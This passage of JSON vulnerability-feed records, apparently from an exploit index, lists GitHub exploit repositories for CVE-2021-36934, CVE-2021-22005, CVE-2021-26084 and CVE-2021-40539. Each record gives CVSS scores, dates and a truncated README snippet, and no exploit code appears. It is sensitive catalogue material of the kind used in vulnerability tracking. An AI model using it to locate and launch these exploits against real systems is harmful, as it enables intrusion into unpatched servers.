"LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T21:54:45", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-28T01:48:39", "id": "27CF7C36-9804-5585-80B1-749949BF7AD5", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T08:42:24", "description": "# ShadowSteal | CVE-2021-36934\nPure Nim implementation for explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T22:16:49", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-27T07:12:59", "id": "82FD6A90-EA27-5350-98A4-491B6CA140ED", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:52", "description": "# Oxide Hive\nAn exploit for the HiveNightmare/SeriousSAM vulnera...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:01:21", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-05-01T09:47:57", "id": "4FD5C1B6-357A-5C95-AE75-CF79BDD32592", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T23:54:50", "description": "# CVE-2021-36934\n\nC# implementation of [C...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-24T12:55:05", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-08-13T21:20:25", "id": "D76E0403-C1B5-59A1-A7E5-B8D3BE2E636D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:28", "description": "# CVE-2021-36934\n![Screenshot](https://github...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T08:01:08", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T08:18:37", "id": "BF498AAC-B85E-5E3F-87EC-BC028A10A6D6", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:06:02", "description": "# CVE-2021-36934\nSeriousSAM Auto Exploiter\n\n# Requirements\n- Hiv...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-01T19:54:31", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-04-20T08:36:49", "id": "73C3C634-4118-5E8F-A7A7-ADE9356507EC", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:16", "description": "# CVE-2021-36934\nCVE-2021-36934 HiveNightmare vulnerability chec...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-29T20:35:22", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-30T12:29:18", "id": "E1AF9415-BECF-5F8A-9233-786A0F50E149", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:10:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-01-22T01:53:54", "id": "943CFE24-FF5E-5BEA-B1DF-3163AED2C847", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:51", "description": "# VSSCopy\nSmall and dirty PoC f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:55:23", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T14:35:30", "id": "6F87E072-E5AF-533F-8FC7-725ACB3BD31F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:33:41", "description": "<p><strong>Windows Elevation of Privilege Vulnerability CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-04T10:37:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T10:47:55", "id": "158640B4-C919-5413-ABA9-DF7D5AE3CC11", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:25", "description": "[CVE described on MSRC](https://msrc.microsoft.com/update-guide/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T14:53:09", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-06T14:49:37", "id": "6B43F1C6-9617-5317-90DA-3EB5A74767E2", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-16T20:01:22", "description": "# CVE-2021-22005-\nCVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T07:19:42", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-07-16T13:57:16", "id": "97046A6F-8428-5DCF-88B4-4101351D637C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:04:56", "description": "# CVE-2021-22005\n\nVMware vCenter RCE CVE-2021-22005 one-liner ma...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:09:03", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-13T21:13:47", "id": "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:44:11", "description": "# cve-2021-22005-exp\n\n## 0x01 \u6f0f\u6d1e\u7b80\u4ecb\n2021\u5e749\u670821\u65e5\uff0cVMware\u53d1\u5e03\u5b89\u5168\u516c\u544a\uff0c\u516c\u5f00\u62ab\u9732\u4e86...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-18T08:18:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-11-24T20:21:04", "id": "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:05:32", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5DB14853-1EDB-5A80-BD98-BB388CC80401", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:03:13", "description": "# VMWare-C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T19:11:22", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-17T19:20:50", "id": "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:03:21", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T23:14:01", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-11-09T18:14:11", "id": "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:59:39", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-17T02:51:40", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T16:02:02", "id": "20869A6E-1505-5A22-A2AB-A712FA03D363", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:00:24", "description": "Exploitation code for CVE-2021-40539\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T14:49:27", "type": "githubexploit", "title": "Exploit for Use of Incorrectly-Resolved Name or Reference in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 